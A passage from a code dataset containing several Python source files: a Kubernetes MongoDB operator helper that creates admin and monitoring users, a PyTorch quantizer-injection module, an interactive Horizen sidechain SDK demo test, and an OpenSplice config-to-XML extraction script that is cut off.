b64decode(\n monitoring_credentials.data['username']).decode('utf-8')\n monitoring_password = b64decode(\n monitoring_credentials.data['password']).decode('utf-8')\n\n mongo_command = '''\n admin = db.getSiblingDB(\"admin\")\n admin.createUser(\n {{\n user: \"{}\",\n pwd: \"{}\",\n roles: [ {{ role: \"root\", db: \"admin\" }} ]\n }}\n )\n admin.auth(\n \"{}\",\n \"{}\"\n )\n admin.createUser(\n {{\n user: \"{}\",\n pwd: \"{}\",\n roles: [ {{ role: \"clusterMonitor\", db: \"admin\" }} ]\n }}\n )\n '''.format(\n admin_username, admin_password,\n admin_username, admin_password,\n monitoring_username, monitoring_password)\n\n for i in range(replicas):\n pod_name = '{}-{}'.format(name, i)\n exec_cmd = [\n 'mongo',\n 'localhost:27017/admin',\n '--ssl',\n '--sslCAFile', '/etc/ssl/mongod/ca.pem',\n '--sslPEMKeyFile', '/etc/ssl/mongod/mongod.pem',\n '--eval', '{}'.format(mongo_command)]\n exec_resp = stream(core_api.connect_get_namespaced_pod_exec,\n pod_name,\n namespace,\n command=exec_cmd,\n container='mongod',\n stderr=True,\n stdin=False,\n stdout=True,\n tty=False)\n\n if 'Successfully added user: {' in exec_resp:\n logging.info('created users for {} in ns/{}'.format(\n name, namespace))\n return True\n elif \"Error: couldn't add user: not master :\" in exec_resp:\n # most of the time member-0 is elected master\n # if it is not we get this error and need to\n # loop through members until we find the master\n continue\n else:\n logging.error('error creating users for {} in ns/{}\\n{}'.format(\n name, namespace, exec_resp))\n return False\n","repo_name":"kbst/mongodb","sub_path":"mongodb_operator/mongodb_operator/mongodb_helpers.py","file_name":"mongodb_helpers.py","file_ext":"py","file_size_in_byte":5920,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"66"} +{"seq_id":"26318972510","text":"from typing import Dict, Tuple, List\n\nimport torch as t\nfrom omegaconf import OmegaConf, DictConfig\n\nfrom apputil import load_obj\nfrom .func import DefaultQuantizedModuleMapping, QUAN_MODULE_MAPPING_TYPE\nfrom .quantizer import Quantizer, IdentityQuantizer\n\n\ndef quantizer(cfg_quantizer: DictConfig) -> Quantizer:\n c = dict(cfg_quantizer)\n if c['class_name']:\n q = load_obj(c['class_name'], default_obj_path='neuralzip.quantizer')\n else:\n q = IdentityQuantizer\n return q(**c['params'])\n\n\ndef _replace_module_by_names(model: t.nn.Module,\n modules_to_replace: Dict[str, t.nn.Module],\n quantized_module_mapping: QUAN_MODULE_MAPPING_TYPE) -> t.nn.Module:\n def helper(child: t.nn.Module):\n for n, c in child.named_children():\n if type(c) in quantized_module_mapping.keys():\n for full_name, m in model.named_modules():\n if c is m and full_name in modules_to_replace:\n child.add_module(n, modules_to_replace.pop(full_name))\n break\n else:\n helper(c)\n\n helper(model)\n return model\n\n\ndef quantizer_inject(\n model: t.nn.Module,\n cfg_quan: DictConfig,\n quantized_module_mapping: QUAN_MODULE_MAPPING_TYPE = DefaultQuantizedModuleMapping\n) -> t.nn.Module:\n # Find modules to quantize\n modules_to_replace = dict()\n for name, module in model.named_modules():\n if type(module) in quantized_module_mapping.keys():\n if cfg_quan.excepts is not None and name in cfg_quan.excepts:\n cfg_quan_weight = OmegaConf.merge(cfg_quan.weight, cfg_quan.excepts[name].weight)\n cfg_quan_act = OmegaConf.merge(cfg_quan.act, cfg_quan.excepts[name].act)\n else:\n cfg_quan_weight = cfg_quan.weight\n cfg_quan_act = cfg_quan.act\n if cfg_quan_weight['class_name'] or cfg_quan_act['class_name']:\n mapped_module = quantized_module_mapping[type(module)]\n modules_to_replace[name] = mapped_module(\n module,\n quan_w_fn=quantizer(cfg_quan_weight),\n quan_a_fn=quantizer(cfg_quan_act)\n )\n elif cfg_quan.excepts is not None and name in cfg_quan.excepts:\n raise KeyError('Cannot find module %s in the model', name)\n\n quantized_model = _replace_module_by_names(model, modules_to_replace, quantized_module_mapping)\n return quantized_model\n\n\ndef quantizer_stat(model: t.nn.Module) -> Tuple[int, Dict[str, List[str]]]:\n quan_dict = dict()\n quan_cnt = 0\n for n, m in model.named_modules():\n if isinstance(m, Quantizer):\n quan_cnt += 1\n quan_name = str(type(m))\n quan_dict[quan_name] = quan_dict.get(quan_name, []) + [n]\n return quan_cnt, quan_dict\n","repo_name":"zhutmost/neuralzip","sub_path":"neuralzip/quantizer_inject.py","file_name":"quantizer_inject.py","file_ext":"py","file_size_in_byte":2912,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"66"} +{"seq_id":"4566195987","text":"#!/usr/bin/env python3\nimport json\nimport logging\nimport os\nimport time\n\nfrom SidechainTestFramework.sc_boostrap_info import SCNodeConfiguration, SCCreationInfo, \\\n MCConnectionInfo, SCBootstrapInfo, NO_KEY_ROTATION_CIRCUIT\nfrom SidechainTestFramework.sc_test_framework import SidechainTestFramework\nfrom test_framework.util import assert_equal, assert_true, start_nodes, \\\n websocket_port_by_mc_node_index, initialize_chain_clean, connect_nodes_bi, COIN\nfrom SidechainTestFramework.scutil import start_sc_nodes, \\\n generate_secrets, generate_vrf_secrets, generate_certificate_proof_info, \\\n bootstrap_sidechain_node, generate_next_blocks, launch_bootstrap_tool, cert_proof_keys_paths, \\\n csw_proof_keys_paths, generate_csw_proof_info\n\n\"\"\"\nDemo flow of how to bootstrap SC network and start SC nodes.\n\nConfiguration: 2 MC nodes\n\nTest:\n - Bootstrap SC network\n - Start 1 SC node connected to MC\n - Do FT\n - Do sidechain internal transaction\n - Do BT\n\"\"\"\n\n# set this constant to False for not having an interactive behaviour\nINTERACTIVE = True\n\n\nclass Demo(SidechainTestFramework):\n\n def setup_chain(self):\n initialize_chain_clean(self.options.tmpdir, 2)\n\n def setup_network(self, split=False):\n # Setup nodes and connect them\n self.nodes = self.setup_nodes()\n connect_nodes_bi(self.nodes, 0, 1)\n self.sync_all()\n\n def setup_nodes(self):\n return start_nodes(2, self.options.tmpdir)\n\n def sc_setup_chain(self):\n return\n\n def sc_setup_nodes(self):\n return\n\n def sc_setup_network(self, split=False):\n return\n\n def run_test(self):\n # Activate Sidechains fork\n mc_node = self.nodes[0]\n mc_node_miner = self.nodes[1]\n mc_node.generate(20) # Generate first 20 block by main MC node to get some reward coins\n self.sync_all()\n mc_node_miner.generate(400) # Generate the rest by another node.\n self.sync_all()\n logging.info(\"MC Node started.\")\n\n mc_height = mc_node.getblockcount()\n logging.info(\"MC chain height is \" + str(mc_height) + \". Sidechains fork activated.\\n\")\n\n self.pause()\n\n # Declare SC creation output tx\n logging.info(\"\\nDeclaring new Sidechain in MC network.\")\n sc_node_configuration = SCNodeConfiguration(\n MCConnectionInfo(address=\"ws://{0}:{1}\".format(mc_node.hostname, websocket_port_by_mc_node_index(0)))\n )\n\n creation_amount = 100 # Zen\n withdrawal_epoch_length = 10\n sc_creation_info = SCCreationInfo(mc_node, creation_amount, withdrawal_epoch_length)\n accounts = generate_secrets(\"seed\", 1, self.model)\n vrf_keys = generate_vrf_secrets(\"seed\", 1, self.model)\n genesis_account = accounts[0]\n vrf_key = vrf_keys[0]\n ps_keys_dir = os.getenv(\"SIDECHAIN_SDK\", \"..\") + \"/qa/ps_keys\"\n if not os.path.isdir(ps_keys_dir):\n os.makedirs(ps_keys_dir)\n\n cert_keys_paths = cert_proof_keys_paths(ps_keys_dir)\n\n certificate_proof_info = generate_certificate_proof_info(\"seed\", 7, 5, cert_keys_paths, True,\n NO_KEY_ROTATION_CIRCUIT, self.model)\n\n csw_keys_paths = csw_proof_keys_paths(ps_keys_dir, sc_creation_info.withdrawal_epoch_length)\n csw_vr_key = generate_csw_proof_info(withdrawal_epoch_length, csw_keys_paths, self.model)\n\n custom_data = vrf_key.publicKey\n fe_certificate_field_configs = [255, 255]\n\n cmdInput = {\n \"version\": 0,\n \"withdrawalEpochLength\": withdrawal_epoch_length,\n \"toaddress\": genesis_account.publicKey,\n \"amount\": sc_creation_info.forward_amount,\n \"wCertVk\": certificate_proof_info.verificationKey,\n \"customData\": custom_data,\n \"constant\": certificate_proof_info.genSysConstant,\n \"wCeasedVk\": csw_vr_key,\n \"vFieldElementCertificateFieldConfig\": fe_certificate_field_configs\n }\n logging.info(\"Running sc_create RPC call on MC node:\\n\" +\n 'sc_create {} '.format(json.dumps(cmdInput, indent=4, sort_keys=True)))\n logging.info(\n \"where arguments are:\\nwithdrawal epoch length - {}\\nfirst Forward Transfer receiver address in the \"\n \"Sidechain - {}\\nfirst Forward Transfer amount - {} ({} Zen)\\nwithdrawal certificate verification key \"\n \"- {}\\nfirst ForgerBox VRF public key - {}\\nwithdrawal certificate Snark proof public input - {}\\n\".format(\n withdrawal_epoch_length, genesis_account.publicKey, sc_creation_info.forward_amount * COIN,\n sc_creation_info.forward_amount,\n certificate_proof_info.verificationKey, custom_data, certificate_proof_info.genSysConstant))\n\n self.pause()\n\n # Create Tx and Block\n sc_create_res = mc_node.sc_create(cmdInput)\n\n transaction_id = sc_create_res[\"txid\"]\n logging.info(\"Sidechain creation transaction Id - {0}\".format(transaction_id))\n\n sidechain_id = sc_create_res[\"scid\"]\n logging.info(\"Sidechain created with Id - {0}\\n\".format(sidechain_id))\n\n logging.info(\"Generating Block with sidechain creation transaction...\")\n block_id = mc_node.generate(1)[0]\n logging.info(\"Block id - {}\\n\".format(block_id))\n\n self.pause()\n\n # Declare SC genesis data config info\n logging.info(\"\\nPreparing Sidechain network configuration.\")\n logging.info(\n \"Running getscgenesisinfo RPC call on MC to get the Sidechain related data for genesis block generation:\\n\" +\n 'getscgenesisinfo \"{}\"'.format(sidechain_id))\n\n genesis_info = [mc_node.getscgenesisinfo(sidechain_id), mc_node.getblockcount(), sidechain_id]\n\n jsonParameters = {\n \"secret\": genesis_account.secret,\n \"vrfSecret\": vrf_key.secret,\n \"info\": genesis_info[0],\n \"regtestBlockTimestampRewind\": 720 * 120 * 5\n }\n jsonNode = launch_bootstrap_tool(\"genesisinfo\", jsonParameters, self.model)\n logging.info(\"\\nCalculating Sidechain network genesis data using ScBootstrappingTool command:\\n\" +\n \"genesisinfo {}\\n\".format(json.dumps(jsonParameters, indent=4, sort_keys=True)) +\n \"where arguments are:\\ninfo - genesis info retrieved from MC on previous step\\nsecret and vrfSecret - private part the corresponds first FT data in sc_create RPC call.\\n\")\n\n self.pause()\n\n # Result of genesis data config info\n logging.info(\"Result:\\n {}\".format(json.dumps(jsonNode, indent=4, sort_keys=True)))\n genesis_data = jsonNode\n\n sidechain_id = genesis_info[2]\n\n sc_bootstrap_info = SCBootstrapInfo(sidechain_id, genesis_account, sc_creation_info.forward_amount,\n genesis_info[1],\n genesis_data[\"scGenesisBlockHex\"], genesis_data[\"powData\"],\n genesis_data[\"mcNetwork\"],\n sc_creation_info.withdrawal_epoch_length, vrf_key, certificate_proof_info,\n genesis_data[\"initialCumulativeCommTreeHash\"], cert_keys_paths,\n csw_keys_paths)\n\n bootstrap_sidechain_node(self.options.tmpdir, 0, sc_bootstrap_info, sc_node_configuration)\n\n self.pause()\n\n # Start SC info\n logging.info(\"\\nStarting Sidechain node...\")\n self.sc_nodes = start_sc_nodes(1, self.options.tmpdir)\n\n sc_node = self.sc_nodes[0]\n\n initial_sc_balance = sc_node.wallet_coinsBalance()[\"result\"]\n logging.info(\"\\nInitial SC wallet balance in satoshi: {}\".format(\n json.dumps(initial_sc_balance, indent=4, sort_keys=True)))\n\n initial_boxes_balances = sc_node.wallet_allBoxes()[\"result\"]\n logging.info(\n \"\\nInitial SC wallet boxes: {}\".format(json.dumps(initial_boxes_balances, indent=4, sort_keys=True)))\n\n self.pause()\n\n # MC balance before FT\n logging.info(\"\\n MC total balance before Forward Transfer is {} Zen\".format(mc_node.getbalance()))\n\n self.pause()\n\n # Do FT\n sc_address = sc_node.wallet_createPrivateKey25519()[\"result\"][\"proposition\"][\"publicKey\"]\n ft_amount = 5\n mc_return_address = mc_node.getnewaddress()\n cmdInput = [{'toaddress': sc_address, 'amount': ft_amount, \"scid\": sc_bootstrap_info.sidechain_id,\n \"mcReturnAddress\": mc_return_address}]\n logging.info(\n \"\\nCreating Forward Transfer with {} satoshi ({} Zen) to Sidechain:\\n\".format(ft_amount * COIN, ft_amount) +\n 'sc_send {}'.format(json.dumps(cmdInput, indent=4, sort_keys=True)))\n\n self.pause()\n\n ft_tx_id = mc_node.sc_send(cmdInput)\n logging.info(\"\\nFT transaction id - {}\".format(ft_tx_id))\n\n # Generate MC block and SC block and check that FT appears in SC node wallet\n logging.info(\"Generating MC Block with Forward Transfer...\")\n self.sync_all()\n mcblock_hash1 = mc_node_miner.generate(1)[0]\n self.sync_all()\n logging.info(\"MC Block id - {}\\n\".format(mcblock_hash1))\n logging.info(\"Generating SC Block to include MC Block Forward Transfer...\")\n scblock_id1 = generate_next_blocks(sc_node, \"first node\", 1)[0]\n\n self.pause()\n\n # MC balance after FT\n logging.info(\"\\n MC total balance after Forward Transfer is {} Zen\".format(mc_node.getbalance()))\n\n self.pause()\n\n # Check balance changes\n sc_balance = sc_node.wallet_coinsBalance()[\"result\"]\n logging.info(\"\\nSC wallet balance in satoshi: {}\".format(\n json.dumps(sc_balance, indent=4, sort_keys=True)))\n\n boxes_balances = sc_node.wallet_allBoxes()[\"result\"]\n logging.info(\"\\nSC wallet boxes: {}\".format(json.dumps(boxes_balances, indent=4, sort_keys=True)))\n\n self.pause()\n\n # Do inchain coins send\n sc_send_amount = 1 # Zen\n logging.info(\"\\nSending {} satoshi ({} Zen) inside sidechain...\".format(sc_send_amount * COIN, sc_send_amount))\n sc_address = sc_node.wallet_allPublicKeys()[\"result\"][\"propositions\"][-1][\"publicKey\"]\n logging.info(sc_address)\n self.send_coins(sc_node, sc_address, sc_send_amount * COIN, 100)\n\n logging.info(\"Generating SC Block with send coins transaction...\")\n scblock_id2 = generate_next_blocks(sc_node, \"first node\", 1)[0]\n\n self.pause()\n\n # Check balance changes\n sc_balance = sc_node.wallet_coinsBalance()[\"result\"]\n logging.info(\"\\nSC wallet balance in satoshi: {}\".format(\n json.dumps(sc_balance, indent=4, sort_keys=True)))\n\n boxes_balances = sc_node.wallet_allBoxes()[\"result\"]\n logging.info(\"\\nSC wallet boxes: {}\".format(json.dumps(boxes_balances, indent=4, sort_keys=True)))\n\n # Do BT\n self.pause()\n mc_address = mc_node.getnewaddress()\n bt_amount = 2 # Zen\n withdrawal_request = {\"outputs\": [\n {\"mainchainAddress\": mc_address,\n \"value\": bt_amount * COIN}\n ]\n }\n\n logging.info(\"\\nCreating Backward Transfer request to withdraw {} satoshi ({} Zen) to the Mainchain...\".format(\n bt_amount * COIN, bt_amount))\n sc_node.transaction_withdrawCoins(json.dumps(withdrawal_request))\n\n logging.info(\"Generating SC Block with Backward Transfer request transaction...\")\n scblock_id3 = generate_next_blocks(sc_node, \"first node\", 1)[0]\n\n self.pause()\n\n # Run block generation till epoch end -> automatic block generation\n logging.info(\"Generating 9 more MC blocks to finish withdrawal epoch for the Sidechain...\")\n mc_block_ids = mc_node.generate(9)\n logging.info(\"MC Block ids - {}\\n\".format(mc_block_ids))\n logging.info(\n \"Generating SC blocks to synchronize MC blocks and automatically start creation of Withdrawal Certificate...\")\n sc_block_ids = generate_next_blocks(sc_node, \"first node\", 4)\n logging.info(\"\\nGenerating Withdrawal Certificate...\\n\")\n\n time.sleep(10)\n while mc_node.getmempoolinfo()[\"size\"] == 0 and sc_node.submitter_isCertGenerationActive()[\"result\"][\"state\"]:\n logging.info(\"Wait for withdrawal certificate in MC memory pool...\")\n time.sleep(2)\n assert_equal(1, mc_node.getmempoolinfo()[\"size\"], \"Certificate was not added to Mc node mempool.\")\n\n certHash = mc_node.getrawmempool()[0]\n logging.info(\"Withdrawal certificate hash - \" + certHash)\n cert = mc_node.getrawtransaction(certHash, 1)\n logging.info(\"Withdrawal certificate - {}\".format(json.dumps(cert, indent=4, sort_keys=True, default=str)))\n\n self.pause()\n\n # Check MC balance for BT destination address before Certificate inclusion\n mc_balance_before_cert = mc_node.getreceivedbyaddress(mc_address)\n logging.info(\"\\nMC address {} balance before Certificate inclusion is = {:.8f} Zen.\".format(mc_address,\n mc_balance_before_cert))\n\n self.pause()\n\n # Generate MC block to include the certificate\n logging.info(\"\\nGenerating 1 more MC block to include Withdrawal certificate in the chain...\")\n mc_block_4 = mc_node.generate(1)[0]\n logging.info(\"MC Block id - {}\\n\".format(mc_block_4))\n\n self.pause()\n\n # Check MC balance for BT destination address before Certificate inclusion\n mc_balance_after_cert = mc_node.getreceivedbyaddress(mc_address)\n logging.info(\"\\nMC address {} balance after Certificate inclusion is = {:.8f} Zen.\".format(mc_address,\n mc_balance_after_cert))\n\n self.pause()\n\n # Get SC balances changes\n sc_balance = sc_node.wallet_coinsBalance()[\"result\"]\n logging.info(\"\\nSC wallet balance in satoshi: {}\".format(\n json.dumps(sc_balance, indent=4, sort_keys=True)))\n boxes_balances = sc_node.wallet_allBoxes()[\"result\"]\n logging.info(\"\\nSC wallet boxes: {}\".format(json.dumps(boxes_balances, indent=4, sort_keys=True)))\n\n self.pause()\n\n def pause(self):\n if INTERACTIVE == True:\n input(\"Press the key to continue...\")\n pass\n\n def send_coins(self, sc_node, receiver, amount, fee):\n j = {\"outputs\": [{\n \"publicKey\": receiver,\n \"value\": amount\n }],\n \"fee\": fee,\n }\n request = json.dumps(j)\n txid = sc_node.transaction_sendCoinsToAddress(request)[\"result\"][\"transactionId\"]\n return txid\n\n\nif __name__ == \"__main__\":\n Demo().main()\n","repo_name":"HorizenOfficial/Sidechains-SDK","sub_path":"qa/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":14972,"program_lang":"python","lang":"en","doc_type":"code","stars":159,"dataset":"github-code","pt":"66"} +{"seq_id":"7037208466","text":"#!/usr/bin/env python\n# This script extracts service-configuration from a source file and merges it with the OpenSplice\n# meta-config XML file. The source-file needs to adhere to the DDSI2-style configuration backend.\n\n# Any data that already exists is overwritten unless the element or attribute XPath is in blacklist\n#\n# Requires: clang, lxml, asciitree==0.2\n\nimport sys\nimport os\n\nimport clang.cindex\nfrom clang.cindex import CursorKind\n\nfrom lxml import etree\nfrom pprint import pprint\n\n# Cfgelem data imported from C can be ignored if name appears on blacklist\n# Note: 'name' is treated as a mandatory field of struct cfgelem\nblacklist = [\n \"Domain\" # Don't generate meta-config for Domain tag, it only exists for retrieving parameters (lease etc)\n]\n\ntypehints = {\n \"uf_nopstring\": {\n \"xmltype\": \"String\"\n },\n \"uf_boolean\": {\n \"xmltype\": \"Boolean\"\n },\n \"uf_tracingOutputFileName\": {\n \"xmltype\": \"String\",\n \"dimension\": \"file path\"\n },\n \"uf_verbosity\": {\n \"xmltype\": \"Enum\",\n \"values\": [ \"finest\", \"finer\", \"fine\", \"config\", \"info\", \"warning\", \"severe\", \"none\" ]\n },\n \"uf_logcat\": { \"xmltype\": \"String\" },\n \"uf_float\": { \"xmltype\": \"Float\" },\n \"uf_timeReal\": { \"xmltype\": \"Float\" },\n \"uf_int32\": { \"xmltype\": \"Int\" },\n \"uf_sched_prio_class\": {\n \"xmltype\": \"Enum\",\n \"values\": [ \"relative\", \"absolute\" ]\n },\n \"uf_sched_class\": {\n \"xmltype\": \"Enum\",\n \"values\": [ \"realtime\", \"timeshare\", \"default\"]\n }\n}\n\n# todo: Should this be part of struct cfgelem?\n# In case of cmagent, everything is community so hard-code it for now\nVERSION=\"COMMUNITY\"\n\nclass CfgElem(object):\n # This class represents the cfgelem struct in python\n def __init__(self, name):\n self.name = name\n\n def __eq__(self, other):\n # This should not be used to compare things that have the same name but a different parent!\n return self.name == other.name\n\n def __str__(self):\n str = \"Name: {}\\n\".format(self.name)\n if self.children:\n str += \" Children: {}\\n\".format(\", \".join(x.name for x in self.children))\n else:\n str += \" XML Type: leaf{}\\n\".format(self.typehint[\"xmltype\"])\n if self.attributes:\n str += \" Attributes: {}\\n\".format(\", \".join(x.name for x in self.attributes))\n str += \" Multiplicity: {}\\n\".format(self.multiplicity)\n str += \" Default: {}\\n\".format(self.default)\n str += \" Description: {}\".format(self.description)\n return str\n\n @property\n def name(self):\n return self.__name\n\n @name.setter\n def name(self, name):\n self.__name = sanitizeString(name)\n\n @property\n def children(self):\n return self.__children\n\n @children.setter\n def children(self, children):\n self.__children = children\n\n @property\n def attributes(self):\n return self.__attrs\n\n @attributes.setter\n def attributes(self, attrs):\n if attrs:\n for attr in attrs:\n assert not attr.children and not attr.attributes, \\\n \"Attribute cannot have children or attributes\"\n self.__attrs = attrs\n\n @property\n def multiplicity(self):\n return self.__multiplicity\n\n @multiplicity.setter\n def multiplicity(self, multiplicity):\n self.__multiplicity = int(multiplicity)\n\n @property\n def default(self):\n return self.__default\n\n @default.setter\n def default(self, default):\n self.__default = sanitizeString(default)\n\n @property\n def description(self):\n return self.__description\n\n @description.setter\n def description(self, description):\n self.__description = sanitizeString(description)\n\n @property\n def typehint(self):\n return self.__typehint\n\n @typehint.setter\n def typehint(self, hint):\n if hint:\n assert not self.children, \\\n \"group element {} should not have typehint ({})\".format(self.name, hint)\n assert hint in typehints, \\\n \"typehint '{}' for leaf element {} is unknown\".format(hint, self.name)\n self.__typehint = typehints[hint]\n else:\n self.__typehint = None\n\ndef sanitizeString(strval):\n # Used for optional string-literals (parsed from C code)\n if strval:\n assert strval.startswith('\"') and strval.endswith('\"'), \\\n \"Expected double-quoted string-literal, got '{}'\".format(strval)\n return strval[1:-1].replace('\\\\n', '').replace('\\\\\"', '\"')\n else:\n return None\n\ndef print_cfgelem_ast(translation_unit):\n # for debugging\n import asciitree # must be v0.2, newer doesn't work!\n for cursor in tu.cursor.get_children():\n if (cursor.kind == CursorKind.VAR_DECL and\n cursor.type.spelling.startswith(\"const struct cfgelem\")):\n asciitree.draw_tree(cursor,\n lambda n: n.get_children(),\n lambda n: \"{} ({}) at {}\".format(n.spelling or n.displayname,\n str(n.kind).split(\".\")[1],\n n.extent))\n\ndef findOrCreateElement(expr, parent, tagname, name_attr=None):\n r = parent.xpath(expr)\n if r:\n # sanity-check the existing XML\n assert len(r) == 1, \\\n \"Multiple ({}) occurrences of {} are not allowed!\".format(len(r))\n print(\"Merge {} in {}\".format(expr[2:], parent.getroottree().getpath(parent)[1:]))\n return r[0]\n else:\n print(\"Insert {} in {}\".format(expr[2:], parent.getroottree().getpath(parent)[1:]))\n if name_attr:\n return etree.SubElement(parent, tagname, name=name_attr)\n else:\n return etree.SubElement(parent, tagname)\n\ndef doSimpleElement(tagname, parent_element, source=None, as_cdata=False):\n # if source-data available, find or create a new element and set source-data as text\n # if source-data is None, find and remove element\n\n if not source is None:\n # Use source as text-data for child-element 'tagname'\n child = findOrCreateElement(\"./{}\".format(tagname), parent_element, tagname)\n if as_cdata:\n data = etree.CDATA(source)\n else:\n data = source\n\n if child.text and child.text != source:\n print(\"Replace '{}' text\".format(tagname))\n child.text = data\n else:\n # Remove child-element 'tagname' if it exists\n r = parent_element.xpath(\"./{}\".format(tagname))\n if r:\n assert len(r) == 1, \\\n \"Multiple ({}) occurrences of '{}' are not allowed!\".format(len(r))\n print(\"Remove '{}'\".format(tagname))\n parent_element.remove(r[0])\n\ndef doLeafElement(element, ce):\n # process content common for attribute-leafs and element-leafs\n\n # default\n doSimpleElement(\"default\", element, ce.default, False)\n\n # dimension\n dimension = ce.typehint.get(\"dimension\", None)\n doSimpleElement(\"dimension\", element, dimension, False)\n\n # Leaf-kind specific child(s)\n if ce.typehint[\"xmltype\"] == \"Enum\":\n # enum values\n r = element.xpath(\"./value\")\n values = list(ce.typehint[\"values\"]) # copy list for removals\n if r:\n for value_element in r:\n if not value_element.text in values:\n print(\"Remove enum value {}\".format(value_element.text))\n element.remove(value_element)\n else:\n values.remove(value_element.text)\n\n for value in values:\n print(\"Insert enum value {}\".format(value))\n value_element = etree.SubElement(element, \"value\")\n value_element.text = value\n\n elif (ce.typehint[\"xmltype\"] == \"Int\" or\n ce.typehint[\"xmltype\"] == \"Float\"):\n # minimum\n minimum = ce.typehint.get(\"minimum\")\n doSimpleElement(\"minimum\", element, minimum, False)\n\n # maximum\n maximum = ce.typehint.get(\"maximum\")\n doSimpleElement(\"maximum\", element, maximum, False)\n elif ce.typehint[\"xmltype\"] == \"String\":\n # maxLength\n maxlength = ce.typehint.get(\"maxlength\") or \"0\"\n doSimpleElement(\"maxLength\", element, maxlength, False)\n\ndef groupToXML(group, parent):\n # Remove XML elements that are not in group, unless parent is splice_meta_config\n # since this script only handles service-config and not the entire config tree...\n\n if parent.tag != \"splice_meta_config\":\n for e in parent.getchildren():\n if (\"name\" in e.attrib and\n not e.tag.startswith(\"attribute\")):\n ce = filter(lambda x: x.name == e.attrib[\"name\"], group)[:1]\n if len(ce) == 0:\n print(\"Remove {}[@name='{}'] {}\".format(e.tag, e.attrib[\"name\"], parent.tag))\n parent.remove(e)\n\n for ce in group:\n if not ce.name in blacklist:\n # element or leaf\n tagname = \"element\" if ce.children else \"leaf{}\".format(ce.typehint[\"xmltype\"])\n expr = \"./{}[@name='{}']\".format(tagname, ce.name)\n element = findOrCreateElement(expr, parent, tagname, ce.name)\n # version attr\n if \"version\" in element.attrib and element.attrib[\"version\"] != VERSION:\n print(\"Replace version attribute {} -> {}\".format(element.attrib[\"version\"], VERSION))\n element.attrib[\"version\"] = VERSION\n # minOccurrences attr\n if ce.multiplicity == 1:\n if ce.children or ce.attributes:\n min = 0\n elif not ce.default:\n min = 1\n else:\n min = 0\n else:\n min = ce.multiplicity\n if \"minOccurrences\" in element.attrib and element.attrib[\"minOccurrences\"] != str(min):\n print(\"Replace minOccurrences attribute {} -> {}\".format(element.attrib[\"minOccurrences\"],\n min))\n element.attrib[\"minOccurrences\"] = str(min)\n # maxOccurrences attr\n if \"maxOccurrences\" in element.attrib and element.attrib[\"maxOccurrences\"] != str(ce.multiplicity):\n print(\"Replace maxOccurrences attribute {} -> {}\".format(element.attrib[\"maxOccurrences\"],\n ce.multiplicity))\n element.attrib[\"maxOccurrences\"] = str(ce.multiplicity)\n\n # comment child\n doSimpleElement(\"comment\", element, ce.description, True)\n\n # attribute childs\n # remove unused from XML\n for e in element.getchildren():\n if (e.tag.startswith(\"attribute\") and\n \"name\" in e.attrib):\n attr_ce = filter(lambda x: (e.tag == \"attribute{}\".format(x.typehint[\"xmltype\"]) and\n e.attrib[\"name\"] == x.name), ce.attributes)[:1]\n if len(attr_ce) == 0:\n print(\"Remove {}[@name={}]\".format(e.tag, e.attrib[\"name\"]))\n element.remove(e)\n if ce.attributes:\n for attr_ce in ce.attributes:\n # attribute element\n tagname = \"attribute{}\".format(attr_ce.typehint[\"xmltype\"])\n expr = \"./{}[@name='{}']\".format(tagname, attr_ce.name)\n attr_element = findOrCreateElement(expr, element, tagname, attr_ce.name)\n # version attr\n if \"version\" in attr_element.attrib and attr_element.attrib[\"version\"] != VERSION:\n print(\"Replace version attribute {} -> {}\".format(attr_element.attrib[\"version\"],\n VERSION))\n attr_element.attrib[\"version\"] = VERSION\n # required attr\n required = \"true\" if attr_ce.multiplicity > 0 else \"false\"\n if \"required\" in attr_element.attrib and attr_element.attrib[\"required\"] != required:\n print(\"Replace required attribute {} -> {}\".format(attr_element.attrib[\"required\"],\n required))\n attr_element.attrib[\"required\"] = required\n\n # comment\n doSimpleElement(\"comment\", attr_element, attr_ce.description, True)\n\n # remaining (leaf-specific) elements\n doLeafElement(attr_element, attr_ce)\n\n if not ce.children:\n # Remove existing element childs\n r = element.xpath(\"./element\")\n if r:\n for e in r:\n print(\"CHILD Remove {}[@name={}]\".format(child.tag, child.attrib[\"name\"]))\n element.remove(e)\n\n # remaining (leaf-specific) elements\n doLeafElement(element, ce)\n\n else:\n groupToXML(ce.children, element)\n else:\n print(\"Skipping blacklisted cfgelem '{}'\".format(ce.name))\n\ndef extract(translation_unit):\n groups = {} # key: group-name, value: list of CfgElem\n\n for cursor in tu.cursor.get_children():\n # Filter variable declarations of type 'const struct cfgelem'\n if (cursor.kind == CursorKind.VAR_DECL and\n cursor.type.spelling.startswith(\"const struct cfgelem\")):\n\n cfgelem_decl = list(cursor.get_children())\n # expected: cfgelem typeref + initializer-list expr\n assert len(cfgelem_decl) == 2, \\\n \"expected two children, got {}\".format(len(cfgelem_decl))\n assert cfgelem_decl[0].kind == CursorKind.TYPE_REF, \\\n \"expected first child to be type-ref, got {}\".format(cfgelem_decl[0].kind)\n assert cfgelem_decl[0].spelling == \"struct cfgelem\", \\\n \"expected struct cfgelem type-ref, got '{}'\".format(cfgelem_decl[0].spelling or\n cfgelem_decl[0].displayname)\n\n for elem in cfgelem_decl[1].get_children():\n if elem.kind == CursorKind.INIT_LIST_EXPR:\n #print(\"Processing member of cfgelem group '{}'\".format(cursor.spelling))\n\n # Find existing group or create a new empty group\n if cursor.spelling not in groups:\n groups[cursor.spelling] = []\n group = groups[cursor.spelling]\n\n members = list(elem.get_children())\n assert len(members) == 12, \\\n \"expected struct with 12 members, got {} members\".format(len(members))\n\n # const char *name\n member = members[0].get_children().next().get_children().next()\n if member.kind == CursorKind.STRING_LITERAL:\n name = member.spelling\n if name == \"\\\"*\\\"\":\n #print(\"Skipping wildcard\")\n continue\n elif member.kind == CursorKind.CSTYLE_CAST_EXPR:\n # assume END_MARKER, anything else should have a name\n #print(\"Skipping end-marker\")\n continue\n else:\n assert False, \\\n \"Unsupported member kind {}\".format(member.kind)\n ce = CfgElem(name)\n\n # const struct cfgelem *children\n member = members[1].get_children().next()\n if member.spelling:\n assert member.spelling != cursor.spelling, \\\n \"cfgelem '{}' cannot be in group '{}' (must be unique)\".format(member.spelling,\n cursor.spelling)\n assert member.spelling in groups, \\\n \"element group {} is unknown\".format(member.spelling)\n ce.children = groups.pop(member.spelling)\n else:\n ce.children = None # This cfgelem has no children\n\n # const struct cfgelem *attributes\n member = members[2].get_children().next()\n if member.spelling:\n assert member.spelling 